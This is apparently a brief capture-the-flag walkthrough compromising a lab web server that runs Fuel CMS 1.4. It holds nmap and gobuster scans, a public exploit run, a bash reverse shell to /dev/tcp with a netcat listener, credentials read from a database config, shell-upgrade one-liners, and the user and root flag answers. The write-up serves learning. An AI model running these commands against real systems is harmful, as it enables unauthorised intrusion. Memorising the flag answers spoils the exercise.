A new start-up has a few issues with their web server
Scan the target with nmap
nmap -A -T4 10.10.138.185
Hmm, found only 1 open port 80 (http)
Go to the web page
It's default page of fuel cms 1.4
Gobuster to discover hidden directory
gobuster dir -u http://10.10.138.185 -w /usr/share/wordlists/dirb/common.txt -t 30
I connected to /0/ and /home/ directory and maybe in vain
I had logggd in and see nothing too
I search exploit for fuelcms
searchsploit fuelcms 1.4
copy exploit
searchsploit -m 47138.py
vi 47138.py
change line 14 to target ip
chmod +x 47138.py
python 47138.py
now we open a reverse shell to control easily
vi rev.sh
bash -i >& /dev/tcp/<your_ip>/4444 0>&1
open 2 tab
python3 -m http.server 80 # http server to download file
and
nc -vlnp 4444 # netcat listener on port 4444
next
okay, we got a shell
search flag on /home
| Flag | User.txt |
|---|---|
| Answer | 6470e394cbf6dab6a91682cc8585059b |
I tried sudo -l -l but it didn't work
during reconnaissance i noticed some instructions related to Database configuration on the webpage
cat fuel/application/config/database.php
there is it
user: root, pass: mememe
i got an error, after gg search, here is the solution
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
here you are
| Flag | root.txt |
|---|---|
| Answer | b9bbcb33e11b80be759c4e844862482d |